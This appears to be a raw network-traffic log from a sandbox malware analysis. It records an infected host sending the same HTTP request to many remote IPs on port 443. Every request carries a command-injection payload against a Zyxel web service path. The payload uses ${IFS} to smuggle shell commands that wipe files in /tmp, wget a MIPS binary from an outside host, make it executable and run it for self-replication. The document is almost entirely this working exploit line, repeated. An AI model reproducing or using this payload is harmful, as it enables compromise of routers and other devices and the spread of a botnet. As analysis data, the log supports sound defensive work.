                                                        Jan 28, 2024 10:12:48.331043005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3350192.168.2.14404789.11.56.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331080914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3351192.168.2.1443642172.210.244.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331126928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3352192.168.2.143732894.131.182.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331161976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3353192.168.2.143994883.254.24.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331202030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3354192.168.2.145529067.99.144.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331238031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3355192.168.2.1445358188.87.5.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331267118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3356192.168.2.144766478.229.121.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331322908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3357192.168.2.146031851.214.9.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331351995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3358192.168.2.1433864177.126.109.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331386089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3359192.168.2.1451696147.206.127.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331425905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3360192.168.2.1445234211.44.65.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331449032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3361192.168.2.146080477.28.207.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331496000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3362192.168.2.145215277.7.251.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331541061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3363192.168.2.1438258155.96.175.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331588030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3364192.168.2.144692213.205.110.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331612110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3365192.168.2.1449626104.1.140.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331655979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3366192.168.2.14388861.10.191.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331703901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3367192.168.2.145333431.204.71.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331753016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3368192.168.2.1438738165.236.137.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331784010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3369192.168.2.1446762104.79.21.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331826925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3370192.168.2.1442140112.72.155.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331878901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3371192.168.2.1437820103.84.69.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331919909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3372192.168.2.145389017.254.55.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.331953049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3373192.168.2.1452170113.161.55.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332000971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3374192.168.2.143694253.102.248.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332030058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3375192.168.2.143336848.34.35.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332050085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3376192.168.2.143783420.0.164.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332091093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3377192.168.2.1459036216.252.126.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332164049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3378192.168.2.144126041.146.175.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332175016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3379192.168.2.1433618140.94.5.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332214117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3380192.168.2.1437804205.99.50.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332254887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3381192.168.2.143638896.147.182.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332282066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3382192.168.2.145681638.228.88.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332334995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3383192.168.2.143810417.244.188.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332386017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3384192.168.2.1454064204.193.247.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332425117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3385192.168.2.1432892143.84.232.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332442999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3386192.168.2.1437376205.176.43.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332493067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3387192.168.2.145837835.160.76.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332551956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3388192.168.2.144463648.96.28.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332582951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3389192.168.2.1450378198.4.91.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332614899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3390192.168.2.1441922136.232.32.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332670927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3391192.168.2.1433124118.12.65.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332707882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3392192.168.2.1444616155.29.159.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332747936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3393192.168.2.1441278212.111.158.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332787991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3394192.168.2.144823025.138.37.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332818031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3395192.168.2.1437084183.97.181.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332875967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3396192.168.2.1434856196.249.109.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332887888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3397192.168.2.1446850143.93.36.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332910061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3398192.168.2.1458418221.62.102.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332967043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3399192.168.2.143500075.29.108.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.332994938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3400192.168.2.1460906149.223.166.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333025932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3401192.168.2.144749284.226.60.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333080053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3402192.168.2.144836875.209.165.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333113909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3403192.168.2.1453988151.109.107.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333152056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3404192.168.2.1454654115.71.119.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333220005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3405192.168.2.145588071.240.225.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333231926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3406192.168.2.1433458217.55.97.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333273888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3407192.168.2.143964458.98.19.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333297968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3408192.168.2.146052435.67.3.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333326101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3409192.168.2.1449890143.144.18.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:48.333355904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3410192.168.2.1457312193.253.219.128443
                                                        TimestampBytes transferredDirectionData
